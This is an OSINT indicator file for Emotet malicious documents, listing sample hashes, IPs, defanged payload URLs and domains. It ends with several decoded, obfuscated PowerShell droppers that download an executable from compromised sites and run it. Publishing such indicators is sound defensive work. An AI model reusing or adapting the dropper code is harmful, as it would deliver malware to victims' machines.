Emotet_Doc_out_2020-09-17_23_27.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. d3a0d1bebe19f71b0659a0b872335d15b031adb5fb6b2d554d21b4ffa2566f84
5. abd391ba30ec357118a07d13079a0259e02352cd1d0926ea893e75dcee25b9e8
6. 33c142bebe8fd0e786a5db3cc089405aa699779e88f811c212cec330927fbaa5
7. b2ef51510cebb41a3b19daa87fbc45731b67810e6fc8af03dd6353778a0a3694
8. 22823faf02dacc31bab524d0ff73e36775b3f629be5a241f9334b6f094220b0e
9. c6dcfa2a31a094225c25a0d53cccd915b76ab34be20b10fc775d740b3e6d9b21
10. 4d2275748dd3705817affba2d9a9a1eda99c5c8c05e97243b48d537c0de0bc9f
11. bb2f1cf59cc83ef51ee2226d600d769353c4cc78b6a2b4774169a012d0bad537
12. 1da1190d2c7472ff429ae35611b7120698dca55175d1c298e68f24f33fc4caec
13. 42f8349a51f2a89dc0e94db8a5437d9a51a817b6a12f77178b9beed274730b5d
14. 3c4a0821165875c1b49f72ae9ff7181a0867bdcf2a2c8496f7487263817e3012
15. 6274d6fc5f58fb23f021e998ce3ba08addb461bc1403267302e7e7a2abc376d4
16. 9de91f69583b1765c182e6952a78af003dd26df75c249ca6c8091fa96fbc5fed
17. 01212645a670921f26fbdad447c6e1f5f245f58e951a5c781ffdfe2188c41dca
18. b793dfcf204566b8cfc24272c1cb1b773a0b718ac3fa0c97b6865e6ed934232a
19. c0b0190e9c0f54631ef80450c23e834d03dc3c1a7f09b6628a90cfd23863d7a1
20. 325a380ed57f51ecc25ea1686443642213bd9c8f9e00eaa57a4aa2933b920987
21. 9ca360d9bc6ec7fe3eb945228ae73b2b92f7ec09cf4593576c11617fa8896e7f
22. 9ca360d9bc6ec7fe3eb945228ae73b2b92f7ec09cf4593576c11617fa8896e7f
23. 03de8778d73e8753ae7006da7b533c87ac0ee1c1552d06188e045d5d578782a7
24. 03de8778d73e8753ae7006da7b533c87ac0ee1c1552d06188e045d5d578782a7
25. 71c10ef5826e77ea309069352d06d519e2707c5ed34f2f7169788a58e512b032
26. 6b876e7e2ab51b43855fc6f61be843893b4f75176e3ba28160330afeb9eb51e0
27. 266182936e91bf387900a37c29c044541d8646676cd85790aa27214e6f210848
28. 54e22118b677aadbd92103152e9eb98f6a37c701dba7fcc87067d84e124d0ba9
29. 498204b7179b4e744a2c48a9c98bf0db418964e72d579a677e818ce06a7410cf
30. 1ee37e9d15c8e0ddf602115c14744881a35377665b3ebeb7d07b8fc212df29e3
31. cc63dfcd6635c5015409c3a12a978b586bf9c3ae9c8c9ed0af8dca8c7384350a
32. ec8a629ad4eba60b9aef40fbac29aa11e1ca1ed58392d46d3ea51f7b96e2c218
33. 754c1c6182cf24004ca005e843e007cff4a65d1a82f13da77528c05c8512c458
34. 754c1c6182cf24004ca005e843e007cff4a65d1a82f13da77528c05c8512c458
35. b99a784e8e870636fa298de56b04b6b1768c85f52bf6a93574728c3bd2e9cc52
36. b3240fbb14733b9f558fe30cb147d6e9c00992afa71b7dbe652f5fb9174b55c0
37. 4c7d03529b2c68ff7e5fd215ff3784d5040c9a9020eb213029cdc0c7dd4ea574
38. 30fae41cd15ad7341c7e91b9e003b523538a2b23f9afa8d601ec22cdb738526b
39. f3b8ff61ea17946cef98f45d9cc0d8a2040fd8786b423f4263667aa81730e644
40. a129e73cc919daf062ce54cb87e34867a4d9578eb4f5698fd07bedd89702da9f
41. d3328d7a586ab8323126ba843927a8a7ea4584f6546dbd143cd42589cefdd2e4
42. b0a9ce0b9fd719fe2a359bd524f9555231f7e32201f9e49e0a681661b3792ee0
43. 19fe4c6dc5c3dfc4d63af00a128954037ecc24924352a669df25ce2a8eda95bd
44. 0bbcf36fb9468cf4e66bdb897dddc8f7b9533bebe58a5dd188e398415630c468
45. 9377f00f0c506d7b1d51679767340ba4632827a2ba7e8450aa85a048c669dd49
46. f2e89a59e17bd990aa45be742ce8a121a9ef6ddd0346d7daa6a815897bb60172
47. 3aa4f27101991883f1d5ff18ca7f7188bb0f473eaf17b1525c590b5c0296a2b7
48.  
49.  
50. IPs:
51. 103.69.130.57
52. 104.18.40.177
53. 104.18.41.177
54. 108.61.200.174
55. 143.208.8.40
56. 156.247.12.228
57. 157.245.235.93
58. 162.241.148.13
59. 171.22.26.120
60. 172.67.179.144
61. 192.163.232.182
62. 198.91.85.131
63. 205.144.171.34
64. 209.59.142.44
65. 216.194.172.150
66. 23.224.135.235
67. 45.32.172.210
68. 52.56.233.157
69. 74.208.236.208
70. 78.31.106.99
71. 91.216.107.195
72. 91.238.160.172
73. 95.130.52.237
74.  
75.  
76.  
77. URLs:
78. hxxp://veccino56.com/gjpra/4ZR/
79. hxxp://girlgeekdinners.com/wp-content/Hpz/
80. hxxp://marblingmagpie.com/COPYRIGHT/Ak/
81. hxxp://aplicativoipok.net/wp-includes/ONW/
82. hxxp://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/
83. hxxps://shd7.life/mlktv/r6/
84. hxxps://www.hairlineunisexsalon.com/demo/UX/."SpL`it"[char]42;
85. hxxp://veccino56.com/gjpra/4ZR/
86. hxxp://girlgeekdinners.com/wp-content/Hpz/
87. hxxp://marblingmagpie.com/COPYRIGHT/Ak/
88. hxxp://aplicativoipok.net/wp-includes/ONW/
89. hxxp://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/
90. hxxps://shd7.life/mlktv/r6/
91. hxxps://www.hairlineunisexsalon.com/demo/UX/."SpL`It"[char]42;
92. hxxp://rhyton-building.com/wp-admin/Ey8qV0/
93. hxxp://ezzll.com/wp-includes/KIU2WU/
94. hxxp://tellmetech.com/wp-content/4ka/
95. hxxps://elmundodelareposteria.com/wp-admin/0PVVmJm/
96. hxxps://manuelrozas.cl/assets/XWN/
97. hxxps://haritdharni.com/wp-admin/bZM/
98. hxxps://theworks-group.com/site/pQT6j5/."SP`Lit"[char]42;
99. hxxp://zcomunicacion.com/wp-admin/Z/
100. hxxp://cooldoggraphics.com/wp-content/Pge/
101. hxxp://canyonplastering.com/wp-content/ZWX/
102. hxxps://stochile.com/sto/PKP/
103. hxxp://voxdream.com/wp-includes/rd/
104. hxxps://www.valetourvirtual.com/vapor/mp/
105. hxxp://z.89fk.top/user/e/."SP`LIT"[char]42;
106.  
107.  
108. Domains:
109. veccino56.com
110. girlgeekdinners.com
111. marblingmagpie.com
112. aplicativoipok.net
113. ec2-52-56-233-157.eu-west-2.compute.amazonaws.com
114. shd7.life
115. www.hairlineunisexsalon.com
116. veccino56.com
117. girlgeekdinners.com
118. marblingmagpie.com
119. aplicativoipok.net
120. ec2-52-56-233-157.eu-west-2.compute.amazonaws.com
121. shd7.life
122. www.hairlineunisexsalon.com
123. rhyton-building.com
124. ezzll.com
125. tellmetech.com
126. elmundodelareposteria.com
127. manuelrozas.cl
128. haritdharni.com
129. theworks-group.com
130. zcomunicacion.com
131. cooldoggraphics.com
132. canyonplastering.com
133. stochile.com
134. voxdream.com
135. www.valetourvirtual.com
136. z.89fk.top
137.  
138.  
139. Decoded Base64 Powershell:
140. ����^�$K_78kds=Wlesjgp;
141. &new-item $Env:UsErprOfIlE\CKzTkyH\zbI1LVz\ -itemtype dIREctorY;
142. [Net.ServicePointManager]::"SecU`RityPr`OtoC`Ol" = tls12, tls11, tls;
143. $Vgpa1ce = X_4ztcqx;
144. $Oyek_ej=Kw1ghpa;
145. $H0exgs1=$env:userprofileoD9CkztkyhoD9Zbi1lvzoD9 -CrePlAcE oD9,[CHaR]92$Vgpa1ce.exe;
146. $Ty0u1l4=P5m4_sm;
147. $F_1g7o1=.new-object NeT.wEBCLienT;
148. $Kv20yyh=hxxp://veccino56.com/gjpra/4ZR/
149. hxxp://girlgeekdinners.com/wp-content/Hpz/
150. hxxp://marblingmagpie.com/COPYRIGHT/Ak/
151. hxxp://aplicativoipok.net/wp-includes/ONW/
152. hxxp://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/
153. hxxps://shd7.life/mlktv/r6/
154. hxxps://www.hairlineunisexsalon.com/demo/UX/."SpL`it"[char]42;
155. $Gg2pox8=Wa5v1qz;
156. foreach$Raz70hv in $Kv20yyh{try{$F_1g7o1."DownLO`A`D`FILe"$Raz70hv, $H0exgs1;
157. $U82osdb=Wrzf3rs;
158. If .Get-Item $H0exgs1."LeN`gtH" -ge 38437 {.Invoke-Item$H0exgs1;
159. $E8bzvoe=Ty1ri9f;
160. break;
161. $U_c29bg=Mu803qo}}catch{}}$Xlttx6h=Qy2pl3x����^�$T8xunu2=Fvflby7;
162. .new-item $eNv:USerprofIle\LWfrhxU\NLFkW63\ -itemtype dIReCtORY;
163. [Net.ServicePointManager]::"seCurit`YP`RO`To`COl" = tls12, tls11, tls;
164. $Qiso498 = Ukfj0bw;
165. $Wprs460=M4y8lnd;
166. $Pp8_50f=$env:userprofileSnHLwfrhxuSnHNlfkw63SnH-rEpLACESnH,[CHaR]92$Qiso498.exe;
167. $W4jwsiq=L5smzt2;
168. $Vjzh0kt=&new-object net.WebCLIENt;
169. $Hmf4utb=hxxp://veccino56.com/gjpra/4ZR/
170. hxxp://girlgeekdinners.com/wp-content/Hpz/
171. hxxp://marblingmagpie.com/COPYRIGHT/Ak/
172. hxxp://aplicativoipok.net/wp-includes/ONW/
173. hxxp://ec2-52-56-233-157.eu-west-2.compute.amazonaws.com/wp-includes/35/
174. hxxps://shd7.life/mlktv/r6/
175. hxxps://www.hairlineunisexsalon.com/demo/UX/."SpL`It"[char]42;
176. $Hzz0cit=Pn6ja0b;
177. foreach$Gz2v6dt in $Hmf4utb{try{$Vjzh0kt."dOW`NLoa`dfi`le"$Gz2v6dt, $Pp8_50f;
178. $Ejof3_q=Zwc_mxd;
179. If &Get-Item $Pp8_50f."leN`G`Th" -ge 39062 {&Invoke-Item$Pp8_50f;
180. $Zwwyf5x=Xafoh5s;
181. break;
182. $Cfqew8l=B_rgta0}}catch{}}$Xhbnp2a=T760li3����^�$Uhxq4lu=Csdink0;
183. &new-item $enV:USeRpROfILE\uofWsUv\lnxYN6_\ -itemtype DireCToRY;
184. [Net.ServicePointManager]::"S`E`C`UrITypr`oTOcOl" = tls12, tls11, tls;
185. $Fzgau0e = Mjlzifmu;
186. $C4i9x5n=Rhmmzqs;
187. $D89iwvk=$env:userprofilebCRUofwsuvbCRLnxyn6_bCR -cREplaCebCR,[chaR]92$Fzgau0e.exe;
188. $Staqmrf=Agetkky;
189. $Wub3m1t=&new-object Net.wEBCLienT;
190. $Anzl9uk=hxxp://rhyton-building.com/wp-admin/Ey8qV0/
191. hxxp://ezzll.com/wp-includes/KIU2WU/
192. hxxp://tellmetech.com/wp-content/4ka/
193. hxxps://elmundodelareposteria.com/wp-admin/0PVVmJm/
194. hxxps://manuelrozas.cl/assets/XWN/
195. hxxps://haritdharni.com/wp-admin/bZM/
196. hxxps://theworks-group.com/site/pQT6j5/."SP`Lit"[char]42;
197. $Ce1slsq=Tuzcxl4;
198. foreach$Pvsedn3 in $Anzl9uk{try{$Wub3m1t."dOWn`loA`D`FIlE"$Pvsedn3, $D89iwvk;
199. $V7txmd_=Q59q16o;
200. If .Get-Item $D89iwvk."L`enGTh" -ge 28279 {.Invoke-Item$D89iwvk;
201. $Lju1_sh=I144d4z;
202. break;
203. $Hzp3au_=C7sua07}}catch{}}$Gsgcie6=Hv_og5t����^�$Xcqxdbk=Mvvi70d;
204. .new-item $eNV:USerPROfilE\cwR0rzz\nKlX4mT\ -itemtype direCtORY;
205. [Net.ServicePointManager]::"Secu`Ri`Ty`pRotoCOl" = tls12, tls11, tls;
206. $Vkij83a = Jilfgk9;
207. $Y3y1uln=Tnn6mn5;
208. $Pybga60=$env:userprofile6eECwr0rzz6eENklx4mt6eE -crEpLacE [cHaR]54[cHaR]101[cHaR]69,[cHaR]92$Vkij83a.exe;
209. $Ixs7erp=Eakvanz;
210. $Neralei=.new-object Net.wEbclIent;
211. $Sp2pteh=hxxp://zcomunicacion.com/wp-admin/Z/
212. hxxp://cooldoggraphics.com/wp-content/Pge/
213. hxxp://canyonplastering.com/wp-content/ZWX/
214. hxxps://stochile.com/sto/PKP/
215. hxxp://voxdream.com/wp-includes/rd/
216. hxxps://www.valetourvirtual.com/vapor/mp/
217. hxxp://z.89fk.top/user/e/."SP`LIT"[char]42;
218. $Duzlouk=Gcrsvj9;
219. foreach$Bnep3xi in $Sp2pteh{try{$Neralei."do`WNL`oADFilE"$Bnep3xi, $Pybga60;
220. $Kj5u4c2=Jdttb4s;
221. If &Get-Item $Pybga60."l`ENGth" -ge 27829 {.Invoke-Item$Pybga60;
222. $Tz3zsy3=Ixc_8_9;
223. break;
224. $Hg2tf5d=F0lb2eq}}catch{}}$C66ugl8=Bhqpzsq